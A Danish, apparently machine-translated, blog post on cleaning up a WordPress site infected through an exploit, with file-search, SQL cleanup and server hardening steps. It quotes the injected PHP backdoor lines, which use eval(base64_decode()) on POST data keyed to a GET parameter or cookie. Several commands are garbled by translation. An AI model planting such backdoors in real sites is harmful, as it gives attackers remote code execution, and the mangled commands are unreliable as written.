Før du læser dette indlæg, skal du se Indlægget her, at forstå noget. )

Jeg fandt i flere filer af blogs på stealthsetts.com, koder, der ligner dem nedenfor, som optrådte som et resultat af virus med Exploitul de WordPress.:

<? php if ($ _ get [‘573ABCB060974771’] ==”8e96d1b4b674e1d2″) {eval (base64_decode ($ _ post [‘fil’])); udgang; }?>

og

<? php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘fil’])); udgang; }?>

I ovenstående tilfælde handler det om filen xmlrpc.php af Søvnig, men på en Grep På serveren kan du se, at der er en hel del koder af sin art i kilder.

Rengøring af inficerede filer:

Oookkkkyouak
1. Den bedste løsning, når den er færdig Backup- og renset databasen, er det sa Slet filerne af WordPress (du kan beholde wp-config.php og de filer, der strengt taget ikke tilhører wp-platformen, efter at de er omhyggeligt kontrolleret) fra serveren og uploade til de originale fra versionen 2.5.1 (ved denne lejlighed opgraderer du også wp-versionen :)): http://wordpress.org/download/ . Slet også temafilerne, hvis du ikke stoler på, at du kan foretage en omhyggelig kontrol af dem.

Det kan ses, at temafiler, der aldrig blev brugt på bloggen, også blev påvirket, og blot at ændre temaet løser ikke dette problem.

./andreea/wp-content/themes/default/index.php:<? php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘fil’])); udgang; }?><?php get_header(); ?>

2. Søg og slet alle filer, der indeholder: *_new.php, *_old.php, *.jpgg, *.giff, *.pngg og wp-info.txt-fil, hvis nogen.

Find. -navn “*_New.php”
Find. -navn “*_old.php”
Find. -navn “*.jpgg”
Find. -navn “* _giff”
Find. -navn “*_pngg”
Find. -navn “wp-info.txt”

3. i /TMP , søg og slet mapper som tmpywbzt2

SQL -rengøring :

1. i tabellen WP_OPTIONS Se om du findes og sletter linjerne: INTERN_LINKS_CACHE, RIS_F541B3ABD05E7962FCAB37737F40FAD8 og WordPress_Options.

2. gå også i WP_Options, gå til Active_plugins Og slet, hvis det findes, et plugin, der ender i en af ​​udvidelserne *_new.php, *_old.php, *.jpgg, *.giff, *.pngg, eller hvis det er en anden mistænksom udvidelse, skal du kontrollere omhyggeligt.

3. i tabellen WP_USERS, se om der er en bruger, der ikke har noget at skrive ved siden af ​​ham, på søjlen user_nicename. Slet denne bruger, men opbevar nummeret på ID -kolonnen. Denne bruger er mulig at bruge "WordPress" som user_login Og det ser ud til at være oprettet på 00:00 0000-00-00.

4. Gå til bordet WP_Usermeta og slet alle de linjer, der hører til ID'et ovenfor.

Når du har gjort denne rengøring af SQL, deaktiveres og aktiverer derefter noget plugin. (i blog -> Dashboard -> Plugins)

Serversikring:

1. Se hvilke mapper og filer der er ”skrivbar"(Chmod 777) og prøv at sætte dem på dem Chmod hvilket ikke længere giver dem mulighed for at skrive fra noget niveau. (For eksempel Chmod 644)

Find. -perm -2 –LS

2. Se hvilke filer der har indstillet biten syd eller skøjte . Hvis du ikke bruger de filer på dem Chmod 0 eller afinstallere den pakke, der indeholder. De er meget farlige, fordi de optræder med privilegierne ”gruppe"Eller"rod"Og ikke med privilegierne for den normale bruger, der udfører den fil.

Find / -type f -perm -04000 -LS
Find / -type f -perm -02000 -LS

3. Kontroller, hvilke porte der er åbne, og prøv at lukke eller sikre dem, der ikke bruges.

Netstat -an | GRIP -I LISTE

Det handler om det. Jeg ser det Nogle blogs er forbudt Af Google Search og andre siger "Nå gjorde dem !!!" . De ville have gjort dem ... men hvad siger du, hvis Google begynder at penge Alle sider Hvem gør SE spam og trojanere (Trojan.clicker.html) i cookies?